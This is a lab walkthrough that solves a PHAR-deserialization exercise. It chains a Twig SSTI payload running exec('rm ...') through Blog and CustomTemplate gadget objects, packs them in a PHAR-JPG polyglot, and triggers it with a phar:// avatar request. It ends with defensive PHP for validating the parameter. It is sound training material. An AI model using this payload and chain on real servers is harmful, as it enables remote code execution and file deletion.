This lab does not explicitly use deserialization. However, if you combine PHAR deserialization with other advanced hacking techniques, you can still achieve remote code execution via a custom gadget chain.
To solve the lab, delete the morale.txt file from Carlos's home directory.
You can log in to your own account using the following credentials: wiener:peter
Learning path
If you're following our suggested learning path, please note that this lab requires some understanding of topics that we haven't covered yet. Don't worry if you get stuck; try coming back later once you've developed your knowledge further.
Observe that the website has a feature for uploading your own avatar, which only accepts JPG images. Upload a valid JPG as your avatar. Notice that it is loaded using GET /cgi-bin/avatar.php?avatar=wiener.
In Burp Repeater, request GET /cgi-bin to find a directory index that lists Blog.php and CustomTemplate.php. Obtain the source code of each by requesting the files with the .php~ backup extension.
Study the source code and identify the gadget chain involving the Blog->desc and CustomTemplate->lockFilePath attributes.
Notice that the file_exists() filesystem function is called on the lockFilePath attribute.
Notice that the website uses the Twig template engine. You can use deserialization to pass in a server-side template injection (SSTI) payload. Find a documented SSTI payload for remote code execution on Twig, and adapt it to delete Carlos's file: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}
Write some PHP that creates a CustomTemplate and a Blog containing your SSTI payload:

```php
<?php
// Minimal stand-ins for the classes found in Blog.php~ and CustomTemplate.php~;
// the properties are assigned dynamically, so empty class bodies are enough.
class CustomTemplate {}
class Blog {}

$object = new CustomTemplate;
$blog = new Blog;

// The Twig SSTI payload goes into desc, the attribute identified in the gadget chain.
$blog->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}';
$blog->user = 'user';

// Link the Blog object into the CustomTemplate so the chain from the source code is reached.
$object->template_file_path = $blog;
```
Create a PHAR-JPG polyglot containing your PHP script. You can find several scripts for doing this online (search for "phar jpg polyglot"). Alternatively, you can download our ready-made one.
Upload this file as your avatar.
In Burp Repeater, modify the request line to deserialize your malicious avatar using a phar:// stream as follows: GET /cgi-bin/avatar.php?avatar=phar://wiener
Send the request to solve the lab.
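From the defender's side, the root cause is that avatar.php hands an attacker-chosen string to file_exists(), which on the affected PHP version unserializes phar metadata. The following is an added example, not the lab's own avatar.php, of how the loader could validate the parameter before any filesystem call; the avatar directory, the .jpg naming and the helper names are assumptions.

```php
<?php
// Added defensive example, not the lab's own avatar.php. It assumes avatars are
// stored as <name>.jpg under a fixed directory ($avatarDir is an assumption).
declare(strict_types=1);

// Defence in depth: if nothing in the application legitimately opens phar
// archives, unregister the wrapper so a phar:// string can never reach the
// filesystem functions that unserialize phar metadata.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

// Allowlist check: a bare avatar name only. "phar://wiener", "../wiener" and
// any other scheme or path separator are rejected here, before any filesystem call.
function isPlainAvatarName(string $avatar): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $avatar) === 1;
}

// Resolve the avatar file for $avatar, or return null if the name is invalid,
// the file is missing, or the resolved path escapes $avatarDir.
function resolveAvatarPath(string $avatar, string $avatarDir): ?string
{
    if (!isPlainAvatarName($avatar)) {
        return null;
    }
    $base = realpath($avatarDir);
    if ($base === false) {
        return null;
    }
    // file_exists() now only ever sees a path built from the allowlisted name
    // and a fixed directory, never an attacker-chosen wrapper string.
    $candidate = $base . DIRECTORY_SEPARATOR . $avatar . '.jpg';
    if (!file_exists($candidate)) {
        return null;
    }
    $real = realpath($candidate);
    if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Constructed inputs mirroring the two request lines used in the lab:
var_dump(isPlainAvatarName('wiener'));        // plain name: accepted
var_dump(isPlainAvatarName('phar://wiener')); // wrapper prefix: rejected before any filesystem call
```

The order matters: the check has to run before file_exists(), because once a phar:// path reaches that call the archive's metadata is unserialized regardless of the file's extension. Since PHP 8.0 phar metadata is no longer unserialized automatically by filesystem functions, so upgrading also removes this trigger.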